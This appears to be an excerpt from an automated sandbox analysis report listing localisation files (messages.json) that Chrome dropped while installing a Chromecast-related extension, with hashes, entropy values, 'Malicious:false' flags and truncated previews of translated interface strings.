                                                                                                                                                                Preview: {"1018984561488520517": {"message": "Fryser"}, "1213957982723875920": {"message": "Hvilket av f\u00f8lgende eksempler beskriver nettverket ditt best?"}, "128276876460319075": {"message": "Enhetsgjenkjenning"}, "1428448869078126731": {"message": "Videojevnhet"}, "1522140683318860351": {"message": "Tilkoblingen mislyktes. Pr\u00f8v p\u00e5 nytt."}, "1550904064710828958": {"message": "Jevn"}, "1636686747687494376": {"message": "Perfekt"}, "1802762746589457177": {"message": "Volum"}, "1850397500312020388": {"message": "Ser du Chromecasten din i $START_LINK$Google Home-appen$END_LINK$? $START_SPAN$*$END_SPAN$", "placeholders": {"END_LINK": {"content": "$1"}, "END_SPAN": {"content": "$2"}, "START_LINK": {"content": "$3"}, "START_SPAN": {"content": "$4"}}}, "1850397500312020388_ph": {"message": "</a>\ue000</span>\ue000<a href=\"https://support.google.com/chromecast/answer/2998456\" target=\"_blank\">\ue000<span class=\"required-message\" ng-show=\"!top.sufficientFeedback\">"}, "21457524299732
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir6020_2046444051\CRX_INSTALL\_locales\nl\messages.json
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):15321
                                                                                                                                                                Entropy (8bit):5.221228928144735
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:192:0Yiepr1oh/Kd1skosMrIpL72Izq8pXL2vVRmdKV6c8TEKdl:04r60XosMrIpLpRXL0G0V6uml
                                                                                                                                                                MD5:6DDB73E39B89687181221341448D2365
                                                                                                                                                                SHA1:FA71231ACE49AEBAD99AF747E173CCC6C7FF0126
                                                                                                                                                                SHA-256:21CAB8AF7F2ABF337CC33C51E9F4FD33A3AF08603CDDB74A30D4A05654F020FF
                                                                                                                                                                SHA-512:FD25E3DCC8DEB8B5EB2FBCAE5C2F0FDD07F507EB2BC3B8AF83CE64DC4C4B4B15D4B73903E73C9668716C609F98A8083AFD44EA59833265CCACCE958CECA65410
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: {.. "1018984561488520517": {.. "message": "Loopt vast".. },.. "1213957982723875920": {.. "message": "Welke beschrijving past het beste bij je netwerk?".. },.. "128276876460319075": {.. "message": "Apparaatdetectie".. },.. "1428448869078126731": {.. "message": "Vloeiendheid van de video".. },.. "1522140683318860351": {.. "message": "Kan geen verbinding maken. Probeer het opnieuw.".. },.. "1550904064710828958": {.. "message": "Vloeiend".. },.. "1636686747687494376": {.. "message": "Perfect".. },.. "1802762746589457177": {.. "message": "Volume".. },.. "1850397500312020388": {.. "message": "Zie je je Chromecast in de $START_LINK$Google Home app$END_LINK$? $START_SPAN$*$END_SPAN$",.. "placeholders": {.. "END_LINK": {.. "content": "$1".. },.. "END_SPAN": {.. "content": "$2".. },.. "START_LINK": {.. "content": "$3".. },..
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir6020_2046444051\CRX_INSTALL\_locales\pl\messages.json
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):15418
                                                                                                                                                                Entropy (8bit):5.346020722930065
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:192:PBUprktnFwP5GkzF0r2Q3SdIucDGGmPlTV6c8TEKdl:ur2CDur2kT9aGydV6uml
                                                                                                                                                                MD5:8254020C39A5F6C1716639CC530BB0D6
                                                                                                                                                                SHA1:A97A70427581ADA902CA73C898825F7B4B4FAC8F
                                                                                                                                                                SHA-256:2F4E4FC6AEB4A8E7F0E0DCE220D66E763F4EBF1FA79985834D636C6692FEA3E8
                                                                                                                                                                SHA-512:9A2CD0F061A943CE04789FF259ECE5B3CCA11EBB6C1DF16C703F70394A5F89415E8EFB79CFB4646FC07FD261170A74602644FFF02ABD38548895CDF7DAB68EB6
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: {.. "1018984561488520517": {.. "message": "Zatrzymuje si.".. },.. "1213957982723875920": {.. "message": "Kt.ra z tych opcji najlepiej opisuje Twoj. sie.?".. },.. "128276876460319075": {.. "message": "Wykrywanie urz.dze.".. },.. "1428448869078126731": {.. "message": "P.ynno.. obrazu".. },.. "1522140683318860351": {.. "message": "Nie uda.o si. nawi.za. po..czenia. Spr.buj ponownie.".. },.. "1550904064710828958": {.. "message": "P.ynna".. },.. "1636686747687494376": {.. "message": "Idealna".. },.. "1802762746589457177": {.. "message": "G.o.no..".. },.. "1850397500312020388": {.. "message": "Czy Chromecasta wida. w.$START_LINK$aplikacji Google Home$END_LINK$? $START_SPAN$*$END_SPAN$",.. "placeholders": {.. "END_LINK": {.. "content": "$1".. },.. "END_SPAN": {.. "content": "$2".. },.. "START_LINK": {.. "content": "
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir6020_2046444051\CRX_INSTALL\_locales\pt\messages.json
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):15475
                                                                                                                                                                Entropy (8bit):5.239856689212255
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:192:L9PpriI0RYHf8kfrvvI/99T+BEsV6c8TEKdl:LrkYPfrgsV6uml
                                                                                                                                                                MD5:FABD5D64267F0E6D7BE6983AB8704F8C
                                                                                                                                                                SHA1:D4DAAD0FF5C461C51E6C1FD22B86AFC5B13E123F
                                                                                                                                                                SHA-256:D82DCA262FF005668B252B478DEDAAC4A5C1E417AF9DE57C22F169A6680183AE
                                                                                                                                                                SHA-512:AD8B2129DCB4F232AEDD7A2B90AF2EFA43497F9118C27AB843D279F7B0EDF70AF95251B46C8098AA831FEC0B2AF6AB0308D3DCFD9AE87BEA8AD9E0D1032E0F8B
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: {.. "1018984561488520517": {.. "message": "Congela".. },.. "1213957982723875920": {.. "message": "Qual das seguintes alternativas melhor descreve sua rede?".. },.. "128276876460319075": {.. "message": "Detec..o de dispositivos".. },.. "1428448869078126731": {.. "message": "Suavidade da reprodu..o do v.deo".. },.. "1522140683318860351": {.. "message": "Falha na conex.o. Tente novamente.".. },.. "1550904064710828958": {.. "message": "Suave".. },.. "1636686747687494376": {.. "message": "Perfeita".. },.. "1802762746589457177": {.. "message": "Volume".. },.. "1850397500312020388": {.. "message": ". poss.vel encontrar seu Chromecast no $START_LINK$app Google Home$END_LINK$? $START_SPAN$*$END_SPAN$",.. "placeholders": {.. "END_LINK": {.. "content": "$1".. },.. "END_SPAN": {.. "content": "$2".. },.. "START_LINK": {.. "content": "$3
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir6020_2046444051\CRX_INSTALL\_locales\ro\messages.json
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):15655
                                                                                                                                                                Entropy (8bit):5.288239072087021
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:192:rpzpr34BALdvonekYFJr2RlYh7YU95cep3AnjYCV6c8TEKdl:HrIqLdv0VYFJrT95c8VCV6uml
                                                                                                                                                                MD5:75E16A8FB75A9A168CFF86388F190C99
                                                                                                                                                                SHA1:C27CE4C1DB3DF2D232925C73DC9AC1FA24DAD396
                                                                                                                                                                SHA-256:9C4716FF42A730F1E7725F0D9E703F311E79FDA31F85B4BB0B8863FC3C27AB9D
                                                                                                                                                                SHA-512:9E0BF56560B1D73F9706FF6AA2D5628CBE58EFCE197899A7EE686B2395D0FA2F9927538DD9B7B152CE2DED4708A210DA3DD6F5350E62AF853E809782997B1922
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: {.. "1018984561488520517": {.. "message": "Redare cu bloc.ri".. },.. "1213957982723875920": {.. "message": "Care dintre urm.toarele descrie cel mai bine re.eaua ta?".. },.. "128276876460319075": {.. "message": "Descoperirea dispozitivelor".. },.. "1428448869078126731": {.. "message": "Calitatea red.rii videoclipului".. },.. "1522140683318860351": {.. "message": "Conexiunea nu s-a stabilit. .ncerca.i din nou.".. },.. "1550904064710828958": {.. "message": "Redare lin.".. },.. "1636686747687494376": {.. "message": "Redare perfect.".. },.. "1802762746589457177": {.. "message": "Volum".. },.. "1850397500312020388": {.. "message": "Chromecastul dvs. apare .n $START_LINK$ aplica.ia Google Home$END_LINK$? $START_SPAN$*$END_SPAN$",.. "placeholders": {.. "END_LINK": {.. "content": "$1".. },.. "END_SPAN": {.. "content": "$2".. },.. "START_LINK
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir6020_2046444051\CRX_INSTALL\_locales\ru\messages.json
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):17686
                                                                                                                                                                Entropy (8bit):5.471928545648783
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:192:Pu6PQpr19XtZkmVpFQkeVBSr/7Nq5k8TyIeBcrvV6c8TEKdl:ir7Q+LASrWk8CirvV6uml
                                                                                                                                                                MD5:8EF94823972EA8D2FC9BB7EC09AB1846
                                                                                                                                                                SHA1:4171DC9CE9D82FDA5A280517A1FE58C907D75CE3
                                                                                                                                                                SHA-256:1009DB9FFA64E411B31E0780EBA43B9C9F8B05B5AC8CCA9A38514650261ABB0A
                                                                                                                                                                SHA-512:83CEC6CF43F4A5A998B987DA6B6F236B36078C560F1CD79366AEBF2950ECD881F0B3ECC1C0769D911381B4A1D5901121E3620CA1AC2401BDE12642BE64EFD67A
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir6020_2046444051\CRX_INSTALL\_locales\sk\messages.json
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):15733
                                                                                                                                                                Entropy (8bit):5.409011445299871
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:192:PIwprzrAXVZprkF9PMZq6rTxnfKVSk7b9V6c8TEKdl:jrojp4F94q6rRsd9V6uml
                                                                                                                                                                MD5:9FDFFDD627F96DF699EC9F9D3625502F
                                                                                                                                                                SHA1:04B830F3C7DA394EEA6063B7405FA12B23E151CA
                                                                                                                                                                SHA-256:73B21C2BD165AA33724EABF134AF52ADD9A7C202A1462F0BEDEA3BC6701DD470
                                                                                                                                                                SHA-512:9B135A8430244EDD5ABDAB2537029765EA33468627EFC39477AFBC8429907DC307A1E5C06E2178472C7D46AE049B7C1F5112B91019056126451023FD2AD66325
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: {.. "1018984561488520517": {.. "message": "Zam.za".. },.. "1213957982723875920": {.. "message": "Ktor. z nasleduj.cich skuto.nost. najlep.ie popisuj. va.u sie.?".. },.. "128276876460319075": {.. "message": "Vyh.ad.vanie zariaden.".. },.. "1428448869078126731": {.. "message": "Plynulos. videa".. },.. "1522140683318860351": {.. "message": "Pripojenie zlyhalo. Sk.ste to znova.".. },.. "1550904064710828958": {.. "message": "Plynul.".. },.. "1636686747687494376": {.. "message": "V.born.".. },.. "1802762746589457177": {.. "message": "Hlasitos.".. },.. "1850397500312020388": {.. "message": "Vid.te svoj Chromecast v.$START_LINK$aplik.cii Google Home$END_LINK$? $START_SPAN$*$END_SPAN$",.. "placeholders": {.. "END_LINK": {.. "content": "$1".. },.. "END_SPAN": {.. "content": "$2".. },.. "START_LINK": {.. "content": "$3"..
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir6020_2046444051\CRX_INSTALL\_locales\sl\messages.json
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):15628
                                                                                                                                                                Entropy (8bit):5.292871661441512
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:192:Ppp0prwFOhNkcUw4kjkNOD7r31RdeYqakV6c8TEKdl:0rXjYwy4Xr34AkV6uml
                                                                                                                                                                MD5:F60AB4E9A79FD6F32909AFAC226446B3
                                                                                                                                                                SHA1:07C9E383D4488BEBE316CA86966FC728F55A2E32
                                                                                                                                                                SHA-256:CDE581E6E7CF0136B003B45549E3BBEE7B67B74ADD786A8D5607BFDAD1DE7B87
                                                                                                                                                                SHA-512:F6A7673A8EFDB7FF74D7B83DD4BCB3683031DB7FBFE6654F6311CBA53EC42F3E45CE2B42A6E385F868271BBDD348272ACF9CE304E2DB52A10B36D24C7B03114F
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: {.. "1018984561488520517": {.. "message": "Zamrzne".. },.. "1213957982723875920": {.. "message": "Kaj od tega najbolje opi.e va.e omre.je?".. },.. "128276876460319075": {.. "message": "Odkrivanje naprav".. },.. "1428448869078126731": {.. "message": "Teko.e predvajanje videoposnetka".. },.. "1522140683318860351": {.. "message": "Vzpostavitev povezave ni uspela. Poskusite znova.".. },.. "1550904064710828958": {.. "message": "Teko.e".. },.. "1636686747687494376": {.. "message": "Odli.no".. },.. "1802762746589457177": {.. "message": "Glasnost".. },.. "1850397500312020388": {.. "message": "Ali je Chromecast viden v $START_LINK$aplikaciji Google Home$END_LINK$? $START_SPAN$*$END_SPAN$",.. "placeholders": {.. "END_LINK": {.. "content": "$1".. },.. "END_SPAN": {.. "content": "$2".. },.. "START_LINK": {.. "content": "$3".. },.
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir6020_2046444051\CRX_INSTALL\_locales\sr\messages.json
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):17766
                                                                                                                                                                Entropy (8bit):5.432888569680161
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:192:AtUpr9riVEviVutkeV74ErXLfWloyWR5RxIj2V6c8TEKdl:AGr1pvtuWDrz9kj2V6uml
                                                                                                                                                                MD5:127A5422BE8B58668A9502DC03C1639C
                                                                                                                                                                SHA1:77603F93079A203D104CFF2806C55330658578FC
                                                                                                                                                                SHA-256:C7B9ECE155924B9FA60662CDC1D1736A210018BD16E4B3E3613A2EE17782F0D6
                                                                                                                                                                SHA-512:2421046C4E921F2181E5B8D4E478332BB74E561E7924D37EB7AB171847EA1D2748C94BB632198F0A78888F6F14EB5F1951B99EFA0AA0DC32A9C8E293CB4C3DC6
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir6020_2046444051\CRX_INSTALL\_locales\sv\messages.json
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):15135
                                                                                                                                                                Entropy (8bit):5.258962752997426
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:192:LY5pr2y3Lm3kONgMr6nxJNuyF5JTpg2NOV6c8TEKdl:Yr5DMrAfpOV6uml
                                                                                                                                                                MD5:897DAE6B0CF0FDE42648F0B47CB26E06
                                                                                                                                                                SHA1:E1F5F5F65AF34FF9484AB2B01E571EAF19BA23D0
                                                                                                                                                                SHA-256:52656C24F6F6D0F3B3FC01E9504C4D5CEB85624F1B22E974CA675DD0E94EB82D
                                                                                                                                                                SHA-512:399DEACFE61F4AF9B24AAA0357D30149CC49DA7825295933D3AE006714B5DE7AC5FCB9EC5340B0E3AB4ABF25641032BBBB5B7D578CD204F4EDEAFE6E08C55663
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: {.. "1018984561488520517": {.. "message": "Fastnar tillf.lligt".. },.. "1213957982723875920": {.. "message": "Vilket av f.ljande beskriver ditt n.tverk b.st?".. },.. "128276876460319075": {.. "message": "Enhetsidentifiering".. },.. "1428448869078126731": {.. "message": "J.mn videouppspelning".. },.. "1522140683318860351": {.. "message": "Det gick inte att ansluta. F.rs.k igen.".. },.. "1550904064710828958": {.. "message": "Flyter p.".. },.. "1636686747687494376": {.. "message": "Perfekt".. },.. "1802762746589457177": {.. "message": "Volym".. },.. "1850397500312020388": {.. "message": "Visas din Chromecast i $START_LINK$ Google Home-appen$END_LINK$? $START_SPAN$*$END_SPAN$",.. "placeholders": {.. "END_LINK": {.. "content": "$1".. },.. "END_SPAN": {.. "content": "$2".. },.. "START_LINK": {.. "content": "$3".. },..
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir6020_2046444051\CRX_INSTALL\_locales\sw\messages.json
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):15156
                                                                                                                                                                Entropy (8bit):5.216902945207334
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:192:6GprWbq4takN4kbvrwJAV5HeY9NVUpnV6c8TEKdl:nrol7rRkpnV6uml
                                                                                                                                                                MD5:EC233129047C1202D87DC140F7BA266D
                                                                                                                                                                SHA1:537E4C887428081365D028F32C53E3C92F29AAA6
                                                                                                                                                                SHA-256:28EDBC5C4858217811D45CAA215710E452C8926E4DE99F810001AD664D08BE0D
                                                                                                                                                                SHA-512:2E3F9BA1EA9EEF921E76B46B5EF2404B3B77B61F18CF67CC78C23C62202227F678A3DBE9C730E42A310800914DC53F25E8B2FBF461839DE33D3501B0BCB4EC8D
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: {.. "1018984561488520517": {.. "message": "Inasita kucheza".. },.. "1213957982723875920": {.. "message": "Ni gani kati ya zifuatazo inaelezea mtandao wako vizuri?".. },.. "128276876460319075": {.. "message": "Kupata Kifaa".. },.. "1428448869078126731": {.. "message": "Ulaini wa Kutiririsha Video".. },.. "1522140683318860351": {.. "message": "Imeshindwa kuunganisha. Tafadhali jaribu tena.".. },.. "1550904064710828958": {.. "message": "Laini".. },.. "1636686747687494376": {.. "message": "Bora".. },.. "1802762746589457177": {.. "message": "Sauti".. },.. "1850397500312020388": {.. "message": "Je, unaweza kuona Chromecast yako katika $START_LINK$ programu ya Google Home$END_LINK$? $START_SPAN$*$END_SPAN$",.. "placeholders": {.. "END_LINK": {.. "content": "$1".. },.. "END_SPAN": {.. "content": "$2".. },.. "START_LINK": {.. "content": "$3
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir6020_2046444051\CRX_INSTALL\_locales\ta\messages.json
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):20531
                                                                                                                                                                Entropy (8bit):5.2537196877590056
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:192:I0N4prlczmbWIO0KISBZdMx4kLQ7rgEsZatRoFkJL+KJtjV6c8TEKdl:0r/TUrRVjV6uml
                                                                                                                                                                MD5:C50C5D2EDFC79DBDCBD5A58A027A3231
                                                                                                                                                                SHA1:14314D760A18C39F06CD072CF5843832AFB86689
                                                                                                                                                                SHA-256:EEB0E89D5AD92B80FF08F88533A111DB3416D7C3860C64227D1CC8B7C2B58298
                                                                                                                                                                SHA-512:A241084C44260C239CB8E6736AB7F7D1988142DDA6CAAD9F907FB42970BE56EC8DA6956BFBE97F926C6EFA32B750F1F57815980494BC31D27DF609C04421AD42
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir6020_2046444051\CRX_INSTALL\_locales\te\messages.json
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):20496
                                                                                                                                                                Entropy (8bit):5.301173454436774
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:384:hcFQcIrxhljbwSb4V6Icdbf1crfrCk0ODzB+pVelGZqsItV6uml:KcNbw4b2reSCb26uml
                                                                                                                                                                MD5:28425862224952A50E881BFA19475ECC
                                                                                                                                                                SHA1:BDAEC83C2988AFE15D886FE5428FA7870FF1FAF4
                                                                                                                                                                SHA-256:793A422E88496566E3EF1E22F30784268716613EBB56C58DC5C0F4B5344F87BF
                                                                                                                                                                SHA-512:16AECF9768E72D3654A6D9CD21EB57693EBCCB15C60B20CE0F722C24627CC64F3BB9BD5951112A1A8933AD65E1ACDD1013D4F1BB433A4170A99B19003FDE929F
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir6020_2046444051\CRX_INSTALL\_locales\th\messages.json
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):18849
                                                                                                                                                                Entropy (8bit):5.3815746250038305
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:384:GhjwMfr4c/ey18Ym7ZepIfa1hea0KEr2ucpYxcixh8V6uml:GhjwMfccGy18Ym7ZiIfa1hea0KEKucp2
                                                                                                                                                                MD5:9F926FCB8BAEA23453B99EA162CCDEA1
                                                                                                                                                                SHA1:04D1E45591C0435A39DCA00A81E83E68585E8B64
                                                                                                                                                                SHA-256:100463C587F549C964A4EB21EA38EA1B4ADEF11E927FAC8FF884623B77202C02
                                                                                                                                                                SHA-512:F226278DDF2D1995961690895361AB7B5D221C5E36D7767BBA71F36716C27B28210F85DC7DB4D2FC61B048FE2D058EE76EFBF2AD2A9714375149C4D09E18BE2B
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir6020_2046444051\CRX_INSTALL\_locales\tr\messages.json
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):15542
                                                                                                                                                                Entropy (8bit):5.336342457334077
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:192:OGNSbprOWklwIc3uk+zwr5a+qF6LtP2nFjYqcV6c8TEKdl:wrfNV9r5avYqcV6uml
                                                                                                                                                                MD5:B0420F071E7C6C2DE11715A0BF026C63
                                                                                                                                                                SHA1:F41CC696786B18805DB8DC9E1E476146C0D6BE90
                                                                                                                                                                SHA-256:309F946F753DF6AF5C255D772EA0D429462152F78ABA4A96A2E369707A2C6B67
                                                                                                                                                                SHA-512:67B42FC962AB70FFF86777E5057047EF4CFFDA4BED040F9D45BB5DB0275C3B5F21B17924AE5C51C71E8B078AB88AE3001C70CDB4E1994D4C8A20DEFC3A1D34FA
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir6020_2046444051\CRX_INSTALL\_locales\uk\messages.json
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):17539
                                                                                                                                                                Entropy (8bit):5.492873573147444
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:384:vDBprzaoaqEv390hrTr6hlRU62cdV6uml:/BaFNe76GYX6uml
                                                                                                                                                                MD5:FF06E78C06E8DFF4A422EA24F0AB3760
                                                                                                                                                                SHA1:A434D1CE22DE0D2FD1842E94F5815F7B1972D1EE
                                                                                                                                                                SHA-256:E209FDEF12CCEC03B4E0D5B9464F90D527E62C5BC4DD565C680661D7F282AB02
                                                                                                                                                                SHA-512:8EADCC918F51A946A68AAF4D9DD7F3894BE470FD0A0550E4160D609F30C78BD55508B3DF4D62A28C0813D83C5C10F9A7BFE656A4CF519E4CC814FFB07F1E9F3B
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir6020_2046444051\CRX_INSTALL\_locales\vi\messages.json
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):16011
                                                                                                                                                                Entropy (8bit):5.466848470908827
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:192:8xyKyprnBss0cEW5xk0rdBrQBiaiNiw+3KrV6c8TEKdl:8ULrBfyW5C0rHrOiZ5gKrV6uml
                                                                                                                                                                MD5:05A2C5EED47B155AA9EC9BC3DC15D6A5
                                                                                                                                                                SHA1:09E795DC1FDF80B5E96728C8B1C701B8194DCF97
                                                                                                                                                                SHA-256:EE794AD0D6BAD28C783962EA92CA2E7CDA8E374FFDF083711B03149EFB2A7D32
                                                                                                                                                                SHA-512:38A10B8357D6A6BEA1BFCB760F2103D2B271477D71811ACD86761B70D4B6C8BD7A80E157CF658D751F8BB169725EBCC748EA2D90AAECC42708064D49DA969585
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir6020_2046444051\CRX_INSTALL\_locales\zh\messages.json
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):14773
                                                                                                                                                                Entropy (8bit):5.670562029027517
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:192:hppr6VVD8/LkiQKrTV2U00jT25kNV6c8TEKdl:hr88/YOrTjF2GV6uml
                                                                                                                                                                MD5:D4513639FFC58664556B4607BF8A3F19
                                                                                                                                                                SHA1:65629BC4CBBACA498F4082DD5884C8D3D7DDDC8A
                                                                                                                                                                SHA-256:C6D49997A9B4FF7FE701EC3644B1A523679A27778FB4BD39B7DBCA9F1ACCE595
                                                                                                                                                                SHA-512:16260FAC30D57EBFD577833F45D52FEA446ABE877D0D4015EF47C5C9072B81DDA71ED4E5E7DAFDEBE82B26556A4477EA4BFCDEC227058E381B9812DAB1F4379B
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir6020_2046444051\CRX_INSTALL\_locales\zh_TW\messages.json
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):14981
                                                                                                                                                                Entropy (8bit):5.7019494203747865
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:192:d2XprmNaHYkOkAFzrlR/jTcGIEaXV6c8TEKdl:WrT4uozrl/sXV6uml
                                                                                                                                                                MD5:494CE2ACB21A426E051C146E600E7564
                                                                                                                                                                SHA1:D045ECC2A69C963D5D34A148FE4A7939DE6A1322
                                                                                                                                                                SHA-256:A1053F9496ED7FA3C625C94347F07A5E760F514FD8EE142EC9EE64E86B9C063D
                                                                                                                                                                SHA-512:DE2C8498B55749B4D35CF2627E55271F7F09E4560FA16D7094EFB4085CF1E5FAE36F067AAC01AE120548C00DC8AA530EE96079B5CC3E322DF9FF8592799AEB3F
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir6020_2046444051\CRX_INSTALL\_metadata\verified_contents.json
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):8873
                                                                                                                                                                Entropy (8bit):5.783771260103677
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:192:RbOTFZn2gSNe3mp5m7B93y1nQ6Yrlyb6LdhdgtSpsB5+lbr:c7n7sKDS83br
                                                                                                                                                                MD5:2F5C87F7644CEEDFECACC84C5F577BDA
                                                                                                                                                                SHA1:5E395505617BBF7CFFDB5251C10D95B508C98A23
                                                                                                                                                                SHA-256:F129C3ECF7D97CC6926DD3AD306E6F4DB6DF15A2090A7B624320989070FEFF0D
